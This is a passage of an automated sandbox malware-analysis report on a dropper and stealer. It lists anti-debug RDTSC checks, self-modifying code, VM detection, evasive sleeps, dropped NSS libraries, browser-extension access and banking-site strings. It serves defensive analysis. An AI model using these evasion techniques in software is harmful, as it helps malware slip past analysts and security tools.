Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 682FA1 second address: 682FCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007FB4390A66B6h 0x00000015 jno 00007FB4390A66B6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 683F04 second address: 683F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 683F0A second address: 683F21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB4390A66BCh 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 674F72 second address: 674F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB438C61F26h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 684E80 second address: 684E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 685E44 second address: 685E51 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 687F26 second address: 687F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 687F2A second address: 687F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 687F30 second address: 687F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 687F36 second address: 687F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 687F3A second address: 687F57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB4390A66C3h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 687F57 second address: 687F7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F33h 0x00000007 jbe 00007FB438C61F26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 687F7B second address: 687F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68851A second address: 688572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FB438C61F28h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b movzx edi, di 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 mov dword ptr [ebp+122D2B47h], edx 0x00000037 pop edi 0x00000038 movzx edi, di 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 688572 second address: 68858F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB4390A66C6h 0x0000000c rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68A50C second address: 68A516 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB438C61F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68A516 second address: 68A571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4390A66BCh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edi, ebx 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D20D1h] 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D3C24h], edi 0x00000020 xchg eax, esi 0x00000021 jc 00007FB4390A66C7h 0x00000027 pushad 0x00000028 jmp 00007FB4390A66BDh 0x0000002d push edx 0x0000002e pop edx 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FB4390A66C8h 0x00000039 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68A571 second address: 68A575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68B41A second address: 68B435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4390A66C0h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68B435 second address: 68B43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68B43B second address: 68B440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 68B440 second address: 68B4C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FB438C61F28h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov ebx, dword ptr [ebp+122D3A01h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FB438C61F28h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 pushad 0x00000049 mov dword ptr [ebp+122D2230h], edx 0x0000004f mov ecx, dword ptr [ebp+122D2E91h] 0x00000055 popad 0x00000056 mov bx, si 0x00000059 je 00007FB438C61F2Bh 0x0000005f sbb bx, CA51h 0x00000064 xchg eax, esi 0x00000065 pushad 0x00000066 push ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 59B541 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 599C4B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6223A0 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Special instruction interceptor: First address: 4CEE39 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Special instruction interceptor: First address: 6651B4 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Special instruction interceptor: First address: 4CEDC1 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Special instruction interceptor: First address: 6F3EC4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: AEE39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 2451B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: AEDC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 2D3EC4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: DBE9B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: DBEA4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: F706F8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: F6ECD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: F834B8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: FFDE6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Special instruction interceptor: First address: D0B541 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Special instruction interceptor: First address: D09C4B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Special instruction interceptor: First address: D923A0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Special instruction interceptor: First address: FADC14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Special instruction interceptor: First address: FADC98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Special instruction interceptor: First address: FADBE8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Special instruction interceptor: First address: 114DA73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Special instruction interceptor: First address: 1158CC3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Special instruction interceptor: First address: 11E8991 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: 61FB541 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: 61F9C4B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Special instruction interceptor: First address: 62823A0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Special instruction interceptor: First address: FB3E17 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 4A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 4BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 6BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 55D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 57B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 77B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 5670000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 58A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Memory allocated: 5670000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_04FA0CDD rdtsc 22_2_04FA0CDD
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 424
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 8579
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 1432 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8664 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8664 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8676 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8676 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8784 Thread sleep count: 424 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8784 Thread sleep time: -12720000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8656 Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8656 Thread sleep time: -138069s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8228 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8684 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8684 Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8656 Thread sleep count: 8579 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8656 Thread sleep time: -17166579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe TID: 8908 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe TID: 2740 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe TID: 7968 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe TID: 6104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe TID: 9144 Thread sleep time: -168000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe TID: 4884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe TID: 8768 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe TID: 5276 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\DocumentsECBGHCGCBK.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6CAEC930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: ECGDBAEH.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: ECGDBAEH.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2492153777.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000002.3026569663.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2973952651.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, 3daf81f16e.exe, 0000001B.00000002.2882880413.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ECGDBAEH.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 3daf81f16e.exe, 00000024.00000002.3289871087.000000000153B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware6\
Source: ECGDBAEH.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: ECGDBAEH.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: ECGDBAEH.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 28d9ab8742.exe, 0000001A.00000003.2848650807.00000000056FF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2847920085.00000000056FF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2850165340.00000000056FF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2851996053.00000000056FF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2862304891.00000000056EF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2862673692.00000000056F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: lqeMuUnwoUAFmVCh
Source: 28d9ab8742.exe, 0000001A.00000002.3026569663.0000000000C19000.00000004.00000020.00020000.00000000.sdmp, 3daf81f16e.exe, 0000001B.00000002.2882880413.00000000014B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: ECGDBAEH.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: ECGDBAEH.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: ECGDBAEH.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: ECGDBAEH.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000002.2492153777.0000000000F78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarel~
Source: ECGDBAEH.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: ECGDBAEH.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 28d9ab8742.exe, 0000001F.00000003.2979008171.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2996362246.0000000005EA8000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2983449791.0000000005EA7000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2996673547.0000000005EA8000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979546877.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTY?
Source: ECGDBAEH.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 3daf81f16e.exe, 00000024.00000002.3289871087.000000000153B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: 3daf81f16e.exe, 00000021.00000002.3090234093.00000000013BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareI
Source: file.exe, file.exe, 00000000.00000002.2489783682.000000000057B000.00000040.00000001.01000000.00000003.sdmp, DocumentsECBGHCGCBK.exe, DocumentsECBGHCGCBK.exe, 00000016.00000002.2530668954.0000000000645000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 00000017.00000002.2555184908.0000000000225000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000018.00000001.2704020694.0000000000225000.00000080.00000001.01000000.0000000D.sdmp, 28d9ab8742.exe, 0000001A.00000002.3027876298.0000000000F4F000.00000040.00000001.01000000.0000000E.sdmp, 28d9ab8742.exe, 0000001A.00000002.3032195949.00000000061DB000.00000040.00000800.00020000.00000000.sdmp, 3daf81f16e.exe, 0000001B.00000002.2881962728.0000000000CEB000.00000040.00000001.01000000.0000000F.sdmp, 28d9ab8742.exe, 0000001F.00000002.3049776651.0000000000F4F000.00000040.00000001.01000000.0000000E.sdmp, be33d1b9ea.exe, 00000020.00000002.3065236093.000000000112F000.00000040.00000001.01000000.00000010.sdmp, 3daf81f16e.exe, 00000021.00000002.3089225827.0000000000CEB000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ECGDBAEH.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: ECGDBAEH.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: ECGDBAEH.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
